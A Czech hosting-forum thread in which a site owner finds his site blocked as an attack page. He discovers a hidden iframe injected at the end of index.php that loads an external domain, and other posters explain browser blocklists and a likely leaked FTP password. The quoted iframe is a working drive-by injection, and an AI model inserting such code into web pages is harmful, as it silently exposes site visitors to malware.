Nahlášená útočná stránka!

Místo zobrazení obsahu se mi zobrazovalo okno s tímto obsahem:

Nahlášená útočná stránka!
Tato webová stránka na serveru kctvm.wz.cz byla nahlášena jako útočná stránka a proto byla na základě vašeho bezpečnostního nastavení zablokována.
Útočné stránky se pokouší nainstalovat programy, které kradou vaše důvěrná data, používají váš počítač k dalším útokům, nebo jakkoliv poničí váš systém.Některé stránky poskytují škodlivý software záměrně, řada z nich byla ale sama napadena a činí tak bez vědomí jejich vlastníků.

Když jsem se podíval, které soubory byly změněny, tak to byl soubor index.php (měl datum změny tento měsíc, ale změnu jsme v něm dělal naposledy v roce 2010) a měl úplně na konci přidáno:

<iframe style="visibility: hidden; display: none; display: none;" src="http://gaoanalitics.info/?id={8845A9BD-5AEE-40FB-87EA-2152C7A2CD25}"></iframe>

Nevím, jak se to tam dostalo. A pokud to způsobovalo napadání stránek, tak už jsem to odstranil.

Proto bych byl rád, kdyby správce mohl opět nastavit, že jsou stránky v pořádku. Případně mi napsal, co mám udělat, aby byly v pořádku a následně funkční.

Děkuji
Musíš to oznámit Google - WZ to neovlivní. Zřejmě ti uniklo heslo k FTP.
A proč Google? Copak Google dělá přesměrování stránky? To si myslím, že je dílo správce. Přece Google nemůže jen tak zablokovat něčí stránky.
Přesměrování dělá prohlížeč. V mém případě Chromium. Tento prohlížeč se před navštívením jakékoli stránky nejprve podívá do seznamu zabanovaných stránek. Ten seznam je součástí konfigurace prohlížeče, občas se aktualizuje ze serveru Google. Ten svůj seznam aktualizuje podle informací Googlebota.

Podobně distribuuje seznam závadných stránek i Firefox a Opera.

Tobě nezbývá, než počkat, až boti opět navštíví tvůj web a tuto informaci vymažou. Můžeš tomu pomoci tím, že vyhledávačům oznámíš změnu na svých stránkách.
Přiznám se, že to je tedy děs a běs. Díky za info. Zkusím s tím něco udělat.
Zajímavé je, že když jsem opravil ten soubor index.php (mimo jiné nevím, jak se tam kdo mohl dostat, protože heslo zadávám ručně), tak se mi zobrazuje text:

Spojení přerušeno
Spojení se serverem bylo v průběhu načítání stránky ukončeno.
Server je dočasně nedostupný. Zkuste to prosím znovu
za chvíli.
Pokud se vám nezobrazují ani ostatní stránky, zkontrolujte síťové připojení svého počítače.
Pokud je váš počítač chráněn firewallem nebo proxy serverem, zkontrolujte, zda má Firefox přístup na Internet.
To může být klidně jen chvilková indispozice serveru. Počet současných spojení FTP je omezený.

Možná jsi někdy omylem použil správce souborů WZ místo FTP. V každém případě doporučuji heslo změnit.